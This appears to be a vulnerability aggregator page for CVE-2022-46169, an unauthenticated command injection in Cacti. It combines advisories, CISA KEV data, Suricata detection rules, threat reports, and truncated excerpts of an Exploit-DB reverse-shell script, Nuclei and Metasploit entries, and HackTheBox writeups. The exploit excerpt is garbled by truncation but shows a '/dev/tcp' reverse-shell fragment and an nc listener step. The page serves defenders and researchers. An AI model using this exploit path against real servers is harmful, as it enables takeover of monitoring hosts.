CVE-2022-46169
published 2022-12-05CVE-2022-46169: Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2023-03-09
Exploited in the wild
EPSS
99.83%
100.0th percentile
Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. This function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized. This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks serval `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: `. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry. After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cacti | cacti | < 1.2.23 | 1.2.23 |
| cacti | cacti | >= 0 < 1.2.16+ds1-2+deb11u1 | 1.2.16+ds1-2+deb11u1 |
| cacti | cacti | >= 0 < 1.2.22+ds1-3 | 1.2.22+ds1-3 |
| cacti | cacti | >= 0 < 1.2.22+ds1-3 | 1.2.22+ds1-3 |
| cacti | cacti | >= 0 < 1.2.22+ds1-3 | 1.2.22+ds1-3 |
| debian | cacti | < cacti 1.2.22+ds1-3 (bookworm) | cacti 1.2.22+ds1-3 (bookworm) |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_debian9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
CVE-2022-46169: Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users
osv·2022-12-05·CVSS 9.8
CVE-2022-46169 [CRITICAL] CVE-2022-46169: Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users
Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. This function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the
VulnCheck
Cacti Command Injection Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-46169 [CRITICAL] CWE-74 Cacti Command Injection Vulnerability
Cacti Command Injection Vulnerability
Cacti contains a command injection vulnerability that allows an unauthenticated user to execute code.
Affected: Cacti Cacti
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.linkedin.com/posts/the-shadowserver-foundation_unauthenticated-command-injection-activity-7017511524604764160-qaje/; https://www.bleepingcomputer.com/news/security/hackers-exploit-cacti-critical-bug-to-install-malware-open-reverse-shells/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.fortinet.com/blog/threat-research/moobot-strikes-again-targeting-cacti-and-realtek-vulnerabilities; https://unit42.paloaltonetworks.com/network-security-trends-nov-jan/; https://information.rapid7.com/rs/
Ubuntu
Cacti vulnerability
vendor_ubuntu·2025-01-23
CVE-2022-46169 Cacti vulnerability
Title: Cacti vulnerability
Summary: Cacti could be made to crash or run programs if it received
specially crafted network traffic.
It was discovered that Cacti did not properly sanitize the 'poller_id'
parameter in the "remote_agent.php" file. A remote attacker could
possibly use this issue to achieve remote code execution.
Instructions: In general, a standard system update will make all the necessary changes.
CISA
Cacti Command Injection Vulnerability
cisa·2023-02-16·CVSS 9.8
CVE-2022-46169 [CRITICAL] CWE-74 Cacti Command Injection Vulnerability
Vulnerability: Cacti Command Injection Vulnerability
Affected: Cacti Cacti
Cacti contains a command injection vulnerability that allows an unauthenticated user to execute code.
Required Action: Apply updates per vendor instructions.
Notes: https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf; https://nvd.nist.gov/vuln/detail/CVE-2022-46169
Remediation Due Date: 2023-03-09
Debian
CVE-2022-46169: cacti - Cacti is an open source platform which provides a robust and extensible operatio...
vendor_debian·2022·CVSS 9.8
CVE-2022-46169 [CRITICAL] CVE-2022-46169: cacti - Cacti is an open source platform which provides a robust and extensible operatio...
Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. This function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the
Suricata
ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M2 (CVE-2022-46169)
suricata·2022-12-26·CVSS 9.8
CVE-2022-46169 [CRITICAL] ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M2 (CVE-2022-46169)
ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M2 (CVE-2022-46169)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M2 (CVE-2022-46169)"; flow:established,to_server; http.method; content:"GET"; http.header_names; to_lowercase; content:"|0d 0a|x-forwarded-for|0d 0a|"; http.uri.raw; content:"/remote_agent.php?"; content:"action=polldata"; content:"local_data_ids|5b 5d 3d|"; fast_pattern; content:"host_id="; content:"poller_id|3d|"; pcre:"/^(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,github.com/taythebot/CVE-2022-46169; reference:cve,2022-46169; classtype:attempted-admin; sid:2043011; rev:2; metadata:attack_target Server, created_at 2022_12_26, cve CVE_2022_461
Suricata
ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M1 (CVE-2022-46169)
suricata·2022-12-26·CVSS 9.8
CVE-2022-46169 [CRITICAL] ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M1 (CVE-2022-46169)
ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M1 (CVE-2022-46169)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Cacti Unauthenticated RCE Inbound M1 (CVE-2022-46169)"; flow:established,to_server; http.method; content:"GET"; http.header_names; to_lowercase; content:"|0d 0a|x-forwarded-for|0d 0a|"; http.uri; content:"/remote_agent.php?"; content:"action=polldata"; content:"local_data_ids|5b 5d 3d|"; fast_pattern; content:"host_id="; content:"poller_id|3d|"; pcre:"/^(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,github.com/taythebot/CVE-2022-46169; reference:cve,2022-46169; classtype:attempted-admin; sid:2043010; rev:2; metadata:attack_target Server, created_at 2022_12_26, cve CVE_2022_46169,
Exploit-DB
Cacti v1.2.22 - Remote Command Execution (RCE)
exploitdb·2023-03-31·CVSS 9.8
CVE-2022-46169 [CRITICAL] Cacti v1.2.22 - Remote Command Execution (RCE)
Cacti v1.2.22 - Remote Command Execution (RCE)
---
# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)
# Exploit Author: Riadh BOUCHAHOUA
# Discovery Date: 2022-12-08
# Vendor Homepage: https://www.cacti.net/
# Software Links : https://github.com/Cacti/cacti
# Tested Version: 1.2.2x /dev/tcp/{self.rs_host}/{self.rs_port} None:
# Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL
args = parse_args()
e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)
e.exploit()
if __name__ == "__main__":
main()
Nuclei
Cacti <=1.2.22 - Remote Command Injection
nuclei·CVSS 9.8
CVE-2022-46169 [CRITICAL] Cacti <=1.2.22 - Remote Command Injection
Cacti <=1.2.22 - Remote Command Injection
Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
Template:
id: CVE-2022-46169
info:
name: Cacti <=1.2.22 - Remote Command Injection
author: Hardik-Solanki,j4vaovo
severity: critical
description: |
Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote a
Metasploit
Cacti 1.2.22 unauthenticated command injection
metasploit·CVSS 9.8
CVE-2022-46169 [CRITICAL] Cacti 1.2.22 unauthenticated command injection
Cacti 1.2.22 unauthenticated command injection
This module exploits an unauthenticated command injection vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in order to achieve unauthenticated remote code execution as the www-data user. The module first attempts to obtain the Cacti version to see if the target is affected. If LOCAL_DATA_ID and/or HOST_ID are not set, the module will try to bruteforce the missing value(s). If a valid combination is found, the module will use these to attempt exploitation. If LOCAL_DATA_ID and/or HOST_ID are both set, the module will immediately attempt exploitation. During exploitation, the module sends a GET request to /remote_agent.php with the action parameter set to polldata and the X-Forwarded-For header set to the provided value for X_FORWARDED_FO
Unit42
Network Security Trends: November 2022-January 2023
blogs_unit42·2023-05-02·CVSS 9.8
CVE-2021-22005 [CRITICAL] Network Security Trends: November 2022-January 2023
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: November 2022-January 2023
Yiheng An
Published: May 2, 2023
Trend Reports
Vulnerabilities
Attack analysis
CVE-2021-22005
CVE-2021-31602
CVE-2021-33035
CVE-2021-43287
CVE-2022-1118
CVE-2022-27924
CVE-2022-30136
CVE-2022-31137
CVE-2022-44877
CVE-2022-46169
Exploit in the wild
Network security trends
## Executive Summary
Recent observations of exploits used in the wild November 2022-January 2023 reveal that attackers have been using newly published remote code execution vulnerabilities in the following three products:
Roxy-WI, a web interface for managing and monitoring RoxyDNS
CWP, a free web hosting control panel (aka Control Web Panel or CentOS Web Panel)
Cacti, an open-source netw
Unit42
Network Security Trends: November 2022-January 2023
blogs_unit42·2023-05-02
Network Security Trends: November 2022-January 2023
## Executive Summary
Recent observations of exploits used in the wild November 2022-January 2023 reveal that attackers have been using newly published remote code execution vulnerabilities in the following three products:
- Roxy-WI, a web interface for managing and monitoring RoxyDNS
- CWP, a free web hosting control panel (aka Control Web Panel or CentOS Web Panel)
- Cacti, an open-source network monitoring and graphing tool used to track the performance of various network devices, servers and applications
Additionally, attackers have also been taking advantage of a traversal and information disclosure vulnerability in ThoughtWorks GoCD to read sensitive files stored on servers.
In our observations of network security trends, Unit 42 researchers have pinpointed several attacks based o
Fortinet
Moobot Strikes Again - Targeting Cacti And RealTek Vulnerabilities | FortiGuard Labs
blogs_fortinet·2023-03-29·CVSS 9.8
[CRITICAL] Moobot Strikes Again - Targeting Cacti And RealTek Vulnerabilities | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Moobot Strikes Again - Targeting Cacti And RealTek Vulnerabilities
By Cara Lin | March 29, 2023
Affected platforms: Windows, Linux
Impacted parties: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity level: Critical
FortiGuard Labs observed several attacking bursts targeting Cacti and Realtek vulnerabilities in January and March of this year and then spreading ShellBot and Moobot malware. (Figure 1 shows trigger counts from our IPS signatures of the CVE-2021-35394 (Realtek) and CVE-2022-46169 (Cacti) vulnerabilities.)
ShellBot is a malware developed in Perl that uses the Internet Relay Chat (IRC) protocol to communicate with the server, also known as PerlBot. Moobot is a Mirai variant botnet that targets exposed net
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
CTF
MonitorsTwo / README
ctf_writeups·CVSS 6.3
CVE-2022-46169 [MEDIUM] MonitorsTwo / README
# MonitorsTwo - HackTheBox - Writeup
Linux, 20 Base Points, Easy
## Machine
## TL;DR
To solve this machine, we start by using `nmap` to enumerate open services and find ports `22`, and `80`.
***User***: Found `Cacti Version 1.2.22` and used `CVE-2022-46169` to acquire a reverse shell as `www-data`. Discovered the SUID file `capsh` and gained a root shell inside the container using `capsh --gid=0 --uid=0 --`. Found the `/entrypoint.sh` file containing the database (DB) credentials. Identified the hashed password of `marcus` in the DB. Successfully cracked the hash using `john` and employed the obtained password to establish an SSH connection as `marcus`.
***Root***: Based on an email received from `administrator@monitorstwo` addressed to `marcus` it is indicated that the vulnerabili
https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216https://github.com/Cacti/cacti/commit/a8d59e8fa5f0054aa9c6981b1cbe30ef0e2a0ec9https://github.com/Cacti/cacti/commit/b43f13ae7f1e6bfe4e8e56a80a7cd867cf2db52bhttps://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gfhttps://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216https://github.com/Cacti/cacti/commit/a8d59e8fa5f0054aa9c6981b1cbe30ef0e2a0ec9https://github.com/Cacti/cacti/commit/b43f13ae7f1e6bfe4e8e56a80a7cd867cf2db52bhttps://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gfhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-46169
2022-12-05
Published
2023-02-16
Added to CISA KEV
Exploited in the wild